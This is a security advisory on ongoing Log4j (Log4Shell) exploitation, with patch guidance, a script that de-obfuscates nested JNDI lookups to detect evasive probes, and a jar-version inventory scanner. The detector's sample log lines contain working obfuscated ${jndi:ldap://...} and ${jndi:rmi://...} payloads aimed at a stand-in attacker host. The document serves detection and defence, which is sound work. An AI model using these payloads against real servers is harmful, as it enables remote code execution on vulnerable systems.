Cybersecurity Threat Advisory 0001-22: Continued Log4j Scanning Activity
In recent weeks, Microsoft has observed continued attempts by nation-state adversaries and commodity attackers to exploit the security vulnerabilities uncovered in the Log4j open-source logging framework. Barracuda MSP’s Security Operations Center (SOC) is also observing scanning activity and exploit attempts against the related vulnerabilities by threat actors trying to deploy malware. If you have not done so already, we recommend ensuring your systems are patched with the latest update for Log4j to prevent compromise.
Technical Detail & Additional Information
WHAT IS THE THREAT?
Threat actors are continuing attempts to scan for and exploit the Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell) first revealed on December 10th, 2021. Microsoft’s Threat Intelligence Center (MSTIC) released guidance earlier this week stating that “exploitation attempts and testing have remained high during the last weeks of December.” Furthermore, they “observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.” The remote code execution vulnerability in this framework has emerged as a strong vector for threat actors to gain an initial foothold within a network. The weeks after the initial discovery saw four more weaknesses disclosed in the Log4j utility: CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832. Not all four carry the same risk: CVE-2021-45046 left remote code execution possible in certain non-default configurations after the incomplete fix in 2.15.0, CVE-2021-45105 is a denial-of-service flaw, and CVE-2021-4104 (Log4j 1.2 JMSAppender) and CVE-2021-44832 (JDBC Appender) both require the attacker to already control the logging configuration. The practical effect is that a foothold gained through any of these can be turned into persistent control of the compromised asset and used for further campaigns such as cryptocurrency mining or ransomware.
WHY IS IT NOTEWORTHY?
This is especially noteworthy because of how widely Log4j is used. Log4j is an Apache Software Foundation project, but it is bundled into millions of other Java applications and appliances, many of which do not advertise that they carry it. An unpatched device may lead to a threat actor gaining an initial foothold which they can then use to deploy devastating attacks on a network. Even as scanning attempts are not letting up, threat actors have also been attempting to evade string-matching detections by obfuscating the ${jndi:...} lookup they send, for example by assembling the word "jndi" out of nested ${lower:j} lookups or ${::-j} default values so that the literal string never appears in the request, even though Log4j resolves it to the same callback to the attacker-controlled server.
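The following Python script is added to this advisory as an illustration of that evasion and of how a detection can keep up with it; it is not Microsoft's or Barracuda MSP's tooling. It models only the part of Log4j 2's lookup syntax that the obfuscation relies on (the ":-" default value, the lower/upper lookups and the case-insensitive prefix), reduces nested lookups innermost-first, and then matches the canonical ${jndi:...} form. The access-log lines, the TEST-NET addresses and the function names are constructed for the example; a naive_match() that looks for the literal "jndi:ldap" is included to show which of the sample probes it misses.

```python
import re

# Innermost lookup: a ${...} whose body contains no further "${" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
# A canonical JNDI lookup once normalised: ${jndi:<scheme>:<target>}
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):([^}]*)\}", re.IGNORECASE)


def _resolve(body):
    """Reduce one innermost ${...} body the way Log4j 2's StrSubstitutor/Interpolator would.

    Modelled: the ':-' default-value syntax, the lower/upper lookups and the
    case-insensitive lookup prefix. Lookups that cannot be evaluated offline
    (env, sys, date, ctx, ...) collapse to their default when one is given and
    are otherwise left untouched, which also terminates the reduction loop.
    """
    var, default = (body.split(":-", 1) + [None])[:2]
    prefix, sep, name = var.partition(":")
    prefix = prefix.lower()
    if sep and prefix == "lower":
        return name.lower()
    if sep and prefix == "upper":
        return name.upper()
    if sep and prefix == "jndi":
        return "${jndi:" + name + "}"  # keep the lookup literal so the detector can see it
    if default is not None:
        return default
    return "${" + body + "}"


def normalize_lookups(text, max_passes=32):
    """Rewrite nested lookups innermost-first until the string stops changing."""
    for _ in range(max_passes):
        reduced = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if reduced == text:
            break
        text = reduced
    return text


def find_jndi(text):
    """[(scheme, target)] for every JNDI lookup present after normalisation."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(normalize_lookups(text))]


def naive_match(line):
    """The literal string match that the obfuscation is designed to defeat."""
    lowered = line.lower()
    return "jndi:ldap" in lowered or "jndi:rmi" in lowered


def scan_log_lines(lines):
    """(line_no, scheme, target) for each line carrying a JNDI lookup once de-obfuscated."""
    return [(n, scheme, target)
            for n, line in enumerate(lines, 1)
            for scheme, target in find_jndi(line)]


# Constructed sample access-log lines (TEST-NET addresses); the probe rides in the User-Agent field.
UA = '203.0.113.9 - - [04/Jan/2022:08:15:%02d +0000] "GET / HTTP/1.1" 200 "%s"'
SAMPLE_LOG = [
    UA % (1, "${jndi:ldap://198.51.100.7:1389/a}"),
    UA % (2, "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/a}"),
    UA % (3, "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"),
    UA % (4, "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7:1389/a}"),
    UA % (5, "${${upper:j}${upper:n}di:rmi://198.51.100.7:1099/x}"),
    UA % (6, "Mozilla/5.0 (monitoring) build=${sys:build.id:-dev}"),
]

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        print("line %d naive=%-5s de-obfuscated=%s" % (n, naive_match(line), find_jndi(line)))
```

Only the first sample line is caught by the literal match; the four obfuscated variants all normalise to the same ${jndi:ldap://...} or ${jndi:rmi://...} lookup and are reported, while the benign ${sys:...:-dev} line collapses to its default and produces no hit. The reduction deliberately emulates Log4j rather than trying to enumerate obfuscation patterns, so new spellings of the same trick are handled as long as they use the modelled syntax.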
WHAT IS THE EXPOSURE OR RISK?
Successful exploit attempts may lead to threat actors deploying ransomware, cryptocurrency miners, or backdoors to networks. Malicious actors may also attempt to maintain persistence in a network in order to exfiltrate sensitive data. Threat actors have also used this vulnerability as a vector to drop the Meterpreter, Bladabindi (NjRAT) and HabitsRAT remote access tools on systems, which can give them complete control over a machine. MSTIC has noted “At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments” and that “Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.” The U.S. Federal Trade Commission (FTC) has also issued a warning that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” Companies that do not adhere to this warning may face severe legal action for not keeping their systems secure.
WHAT ARE THE RECOMMENDATIONS?
Barracuda MSP recommends the following actions to limit the impact of attempted Log4j exploitations:
- Ensure your systems are up to date if they run an application that bundles Log4j. At the time of this advisory that means Log4j 2.17.1 or later on the Java 8 line (2.12.4 for Java 7, 2.3.2 for Java 6), which addresses all of the CVEs listed above; where a vendor has not yet shipped an updated build, apply the vendor's interim mitigation and track the product for a patch.
- Deploy SKOUT Endpoint Protection, which can actively block any malware dropped by threat actors once the vulnerability is exploited.
- Utilize a strong password policy and perform account audits regularly to ensure a secure network.
- Ensure services such as RDP are not exposed externally, since an open remote-access service would allow a threat actor to log in to your network with valid credentials.
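As an added illustration of the first recommendation (not a Barracuda MSP tool), the following Python script inventories Log4j jars under a directory, including jars nested inside .war and .ear files, reads the version from the Maven pom.properties inside each archive (falling back to the file name), and reports whether JndiLookup.class is still present. The fixed-version thresholds (2.17.1 for Java 8+, 2.12.4 for Java 7, 2.3.2 for Java 6) are the releases that address CVE-2021-44832 on each line. The sample tree it builds under a temporary directory is a constructed fixture containing only the files the scanner reads, not real Log4j jars, and the status labels are this example's own.

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Matches log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar and the 1.x log4j-1.2.17.jar,
# but not log4j-api-*.jar or the log4j-1.2-api-*.jar bridge.
NAME_RE = re.compile(r"log4j(?:-core)?-(\d+(?:\.\d+)*)(?:-[A-Za-z]+\d*)?\.jar$")
# First release on each maintained 2.x line that also fixes CVE-2021-44832.
FIXED = {(2, 12): (2, 12, 4), (2, 3): (2, 3, 2)}  # Java 7 and Java 6 lines
FIXED_DEFAULT = (2, 17, 1)                        # Java 8+ line


def parse_version(s):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' keeps its numeric part."""
    m = re.match(r"(\d+(?:\.\d+)*)", s or "")
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def classify(ver, has_jndi_lookup):
    """Status of one Log4j artifact from its version tuple and whether JndiLookup.class is present."""
    if ver is None:
        return "unknown-version"
    if ver[0] < 2:
        return "log4j-1.x-eol"  # CVE-2021-4104 needs a JMSAppender in the config; 1.x is unsupported anyway
    if ver >= FIXED.get(ver[:2], FIXED_DEFAULT):
        return "fixed"
    if not has_jndi_lookup:
        return "outdated-jndilookup-removed"  # class-removal stop-gap applied; still needs updating
    return "vulnerable"


def inspect_archive(data, label, findings):
    """Record Log4j artifacts in one archive (bytes), recursing into nested jars such as WEB-INF/lib."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:  # Maven metadata beats the file name, which may have been renamed
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    m = NAME_RE.search(label)
    if version is None and m:
        version = m.group(1)
    has_lookup = JNDI_LOOKUP_CLASS in names
    if version is not None or has_lookup:  # a shaded jar with the class but no metadata is still reported
        findings.append({"path": label, "version": version,
                         "status": classify(parse_version(version), has_lookup)})
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            inspect_archive(zf.read(name), label + "!" + name, findings)


def scan(root):
    """Walk root and return findings; paths are relative to root, nested entries joined with '!'."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(full, root).replace(os.sep, "/"), findings)
    return findings


def _zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


def _core(version, with_lookup=True):
    entries = {POM_PROPS: "version=%s\n" % version}
    if with_lookup:
        entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe"  # class-file magic stands in for the real class
    return _zip(entries)


def make_sample_tree():
    """Constructed fixture: minimal archives with only the entries the scanner looks at."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.mkdir(os.path.join(root, "lib"))
    files = {
        "lib/log4j-core-2.14.1.jar": _core("2.14.1"),
        "lib/log4j-core-2.17.1.jar": _core("2.17.1"),
        "lib/log4j-1.2.17.jar": _zip({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"}),
        "app.war": _zip({"WEB-INF/lib/log4j-core-2.14.1.jar": _core("2.14.1", with_lookup=False)}),
    }
    for rel, data in files.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    import sys
    for f in scan(sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()):
        print("%-28s %-8s %s" % (f["status"], f["version"], f["path"]))
```

Run it with a root such as /opt or an application install directory to get one line per artifact; "vulnerable" entries need an update, "outdated-jndilookup-removed" entries have the class-removal workaround in place but are still behind the fixed release, and "unknown-version" flags a jar that carries JndiLookup.class without recognisable metadata and deserves a manual look.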
For more in-depth information about the recommendations, please visit the following links:
If you have any questions, please contact our Security Operations Center.